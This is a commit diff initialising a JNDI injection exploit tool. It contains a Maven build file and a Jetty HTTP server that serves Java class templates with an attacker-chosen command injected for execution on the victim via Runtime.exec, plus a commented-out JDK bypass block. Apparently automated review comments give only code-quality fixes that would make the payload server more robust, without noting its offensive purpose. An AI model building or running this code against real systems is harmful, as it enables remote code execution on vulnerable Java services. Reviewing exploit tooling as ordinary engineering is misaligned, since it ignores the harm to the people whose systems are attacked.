
Commit a7a7d5e

committed
Init
1 parent d5aa7a4 commit a7a7d5e

13 files changed

+1217
-0
lines changed

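--- a/pom.xml
+++ b/pom.xml
@@ -0,0 +1,136 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+<modelVersion>4.0.0</modelVersion>
+
+<groupId>welk1n</groupId>
+<artifactId>JNDI-Injection-Exploit</artifactId>
+<version>1.0-SNAPSHOT</version>
+
+<properties>
+<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+<jetty.version>8.1.9.v20130131</jetty.version>
+</properties>
+
+
+<dependencies>
+<!-- Util -->
+<dependency>
+<groupId>org.ow2.asm</groupId>
+<artifactId>asm</artifactId>
+<version>7.1</version>
+</dependency>
+
+<dependency>
+<groupId>org.javassist</groupId>
+<artifactId>javassist</artifactId>
+<version>3.19.0-GA</version>
+</dependency>
+
+<dependency>
+<groupId>org.reflections</groupId>
+<artifactId>reflections</artifactId>
+<version>0.9.9</version>
+</dependency>
+
+<dependency>
+<groupId>org.slf4j</groupId>
+<artifactId>slf4j-nop</artifactId>
+<version>1.7.24</version>
+</dependency>
+
+<dependency>
+<groupId>org.apache.commons</groupId>
+<artifactId>commons-lang3</artifactId>
+<version>3.4</version>
+</dependency>
+
+<dependency>
+<groupId>commons-cli</groupId>
+<artifactId>commons-cli</artifactId>
+<version>1.3</version>
+</dependency>
+
+
+<!-- For LDAP reference jndi -->
+<dependency>
+<groupId>com.unboundid</groupId>
+<artifactId>unboundid-ldapsdk</artifactId>
+<version>3.1.1</version>
+</dependency>
+
+<!-- Jetty -->
+<dependency>
+<groupId>org.eclipse.jetty.aggregate</groupId>
+<artifactId>jetty-webapp</artifactId>
+<version>${jetty.version}</version>
+</dependency>
+
+<!-- Bypass JDK 1.8.0_191+ -->
+<!-- <dependency>-->
+<!-- <groupId>org.apache.tomcat</groupId>-->
+<!-- <artifactId>tomcat-catalina</artifactId>-->
+<!-- <version>8.5.38</version>-->
+<!-- </dependency>-->
+<!-- <dependency>-->
+<!-- <groupId>org.apache.tomcat</groupId>-->
+<!-- <artifactId>tomcat-jasper-el</artifactId>-->
+<!-- <version>8.5.38</version>-->
+<!-- </dependency>-->
+<!-- <dependency>-->
+<!-- <groupId>org.codehaus.groovy</groupId>-->
+<!-- <artifactId>groovy</artifactId>-->
+<!-- <version>2.4.5</version>-->
+<!-- </dependency>-->
+
+<!-- test -->
+<dependency>
+<groupId>junit</groupId>
+<artifactId>junit</artifactId>
+<version>4.12</version>
+<scope>test</scope>
+</dependency>
+</dependencies>
+
+
+<build>
+<plugins>
+<plugin>
+<groupId>org.apache.maven.plugins</groupId>
+<artifactId>maven-compiler-plugin</artifactId>
+<configuration>
+<source>1.7</source>
+<target>1.7</target>
+</configuration>
+</plugin>
+
+<plugin>
+<artifactId>maven-assembly-plugin</artifactId>
+<version>2.5.5</version>
+<configuration>
+<finalName>${project.artifactId}-${project.version}-all</finalName>
+<appendAssemblyId>false</appendAssemblyId>
+<descriptorRefs>
+<descriptorRef>jar-with-dependencies</descriptorRef>
+</descriptorRefs>
+<archive>
+<manifest>
+<mainClass>run.ServerStart</mainClass>
+</manifest>
+</archive>
+</configuration>
+<executions>
+<execution>
+<id>make-assembly</id>
+<phase>package</phase>
+<goals>
+<goal>single</goal>
+</goals>
+</execution>
+</executions>
+</plugin>
+</plugins>
+</build>
+
+</project>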
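Review bot: The `maven-compiler-plugin` block has no `<version>`, unlike `maven-assembly-plugin` which pins 2.5.5, so the compiler plugin is whatever the local Maven installation resolves and the build is not reproducible; add an explicit `<version>` element to that `<plugin>`. The `jar-with-dependencies` assembly also bundles every library listed here into the `-all` jar, and some pins are old (`jetty.version` 8.1.9.v20130131 comes from a Jetty line that is end-of-life), so the shipped artifact inherits whatever known issues those versions carry. Running a dependency audit as part of the build would make that visible before the jar is distributed.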

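--- a/src/main/java/jetty/JettyServer.java
+++ b/src/main/java/jetty/JettyServer.java
@@ -0,0 +1,113 @@
+package jetty;
+
+import org.eclipse.jetty.server.Server;
+import org.eclipse.jetty.servlet.ServletHandler;
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.*;
+import java.net.URLEncoder;
+
+import static run.ServerStart.getLocalTime;
+import static util.Transformers.insertCommand;
+
+/**
+* @Classname JettyServer
+* @Description HTTPServer supply .class file which execute command by Runtime.getRuntime.exec()
+* @Author welkin
+*/
+public class JettyServer implements Runnable{
+private int port;
+private Server server;
+private static String command;
+
+// public JettyServer(int port) {
+// this.port = port;
+// server = new Server(port);
+// command = "open /Applications/Calculator.app";
+// }
+
+public JettyServer(int port,String cmd) {
+this.port = port;
+server = new Server(port);
+command = cmd;
+}
+
+@Override
+public void run() {
+ServletHandler handler = new ServletHandler();
+server.setHandler(handler);
+
+handler.addServletWithMapping(DownloadServlet.class, "/*");
+try {
+server.start();
+server.join();
+}catch (Exception e){
+e.printStackTrace();
+}
+
+}
+
+@SuppressWarnings("serial")
+public static class DownloadServlet extends HttpServlet {
+public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
+
+String filename = request.getRequestURI().substring(1);
+InputStream in = checkFilename(filename);
+byte[] transformed;
+ByteArrayInputStream bain = null;
+
+if (in != null) {
+try {
+transformed = insertCommand(in,command);
+bain = new ByteArrayInputStream(transformed);
+
+}catch (Exception e){
+e.printStackTrace();
+System.out.println(getLocalTime() + " [JETTYSERVER]>> Byte array build failed.");
+}
+
+System.out.println(getLocalTime() + " [JETTYSERVER]>> Log a request to " + request.getRequestURL());
+response.setStatus(HttpServletResponse.SC_OK);
+response.setHeader("content-disposition", "attachment;filename="+URLEncoder.encode(filename, "UTF-8"));
+
+int len ;
+byte[] buffer = new byte[1024];
+OutputStream out = response.getOutputStream();
+if (bain != null){
+while ((len = bain.read(buffer)) > 0) {
+out.write(buffer,0,len);
+}
+bain.close();
+}else {
+System.out.println(getLocalTime() + " [JETTYSERVER]>> Read file error!");
+}
+}else {
+System.out.println(getLocalTime() + " [JETTYSERVER]>> URL("+ request.getRequestURL() +") Not Exist!");
+}
+}
+
+public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
+doGet(request, response);
+}
+}
+
+private static InputStream checkFilename(String filename){
+String template;
+switch (filename){
+case "ExecTemplateJDK7.class":
+template = "template/ExecTemplateJDK7.class";
+break;
+case "ExecTemplateJDK8.class":
+template = "template/ExecTemplateJDK8.class";
+break;
+// TODO:Add more
+default:
+return null;
+}
+return Thread.currentThread().getContextClassLoader().getResourceAsStream(template);
+
+}
+
+}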
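Review bot: In `DownloadServlet.doGet` neither failure path tells the client anything: an unknown filename falls to the final `else` and returns an empty 200, and when `insertCommand` throws, the code still sets `SC_OK` and `content-disposition` before it finds that `bain` is null. Set the status only after the transform succeeds and answer the other cases explicitly, e.g. `response.sendError(HttpServletResponse.SC_NOT_FOUND); return;`. The template stream `in` returned by `checkFilename` is also never closed; the pom compiles with source level 1.7, so `try (InputStream in = checkFilename(filename))` is available. Separately, `command` is `static` but assigned in the instance constructor, so constructing a second `JettyServer` silently changes what an already running one serves; that single-instance assumption should at least be stated in a comment on the field.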
